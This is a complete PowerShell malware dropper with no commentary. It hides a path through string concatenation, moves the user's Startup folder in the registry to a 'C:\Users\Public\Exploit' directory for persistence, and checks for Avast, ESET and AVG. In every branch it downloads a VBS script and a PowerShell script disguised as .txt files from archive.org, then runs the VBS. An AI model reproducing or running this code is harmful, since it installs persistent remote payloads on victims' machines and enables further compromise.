[system.io.directory]::CreateDirectory("C:\U"+"s"+"e"+"r"+"s"+"\P"+"ub"+"li"+"c"+"\E"+"x"+"p"+"l"+"o"+"i"+"t\")
start-sleep -s 5
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\Users\Public\Exploit";
start-sleep -s 5
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\Users\Public\Exploit";
Function aloshy
{
if([System.IO.File]::Exists("C:\Program Files\Avast Software\Avast\AvastUI.exe")){

start-sleep -s 10



powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://archive.org/download/startoffice/startoffice.txt', 'C:\Users\Public\Exploit\Rundll.vbs') }"

powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://archive.org/download/r-3_20220210_202202/R3.txt', 'C:\Users\Public\ServicesCL.ps1') }"



start-sleep -s 7
Start "C:\Users\Public\Exploit\Rundll.vbs"
start-sleep -s 3
Start "C:\Users\Public\Exploit\Rundll.vbs"

}
elseif([System.IO.File]::Exists("C:\Program Files\ESET\ESET Security\ecmds.exe")){





powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://archive.org/download/startoffice/startoffice.txt', 'C:\Users\Public\Exploit\Rundll.vbs') }"

powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://archive.org/download/r-3_20220210_202202/R3.txt', 'C:\Users\Public\ServicesCL.ps1') }"




start-sleep -s 7
Start "C:\Users\Public\Exploit\Rundll.vbs"
start-sleep -s 3
Start "C:\Users\Public\Exploit\Rundll.vbs"
}


elseif([System.IO.File]::Exists("C:\Program Files\AVG\Antivirus\AVGUI.exe")){





powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://archive.org/download/startoffice/startoffice.txt', 'C:\Users\Public\Exploit\Rundll.vbs') }"


powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://archive.org/download/r-3_20220210_202202/R3.txt', 'C:\Users\Public\ServicesCL.ps1') }"



start-sleep -s 7
Start "C:\Users\Public\Exploit\Rundll.vbs"
start-sleep -s 3
Start "C:\Users\Public\Exploit\Rundll.vbs"

}
else{



powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://archive.org/download/startoffice/startoffice.txt', 'C:\Users\Public\Exploit\Rundll.vbs') }"


powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://archive.org/download/r-3_20220210_202202/R3.txt', 'C:\Users\Public\ServicesCL.ps1') }"



start-sleep -s 7
Start "C:\Users\Public\Exploit\Rundll.vbs"
start-sleep -s 3
Start "C:\Users\Public\Exploit\Rundll.vbs"

}
}
IEX aloshy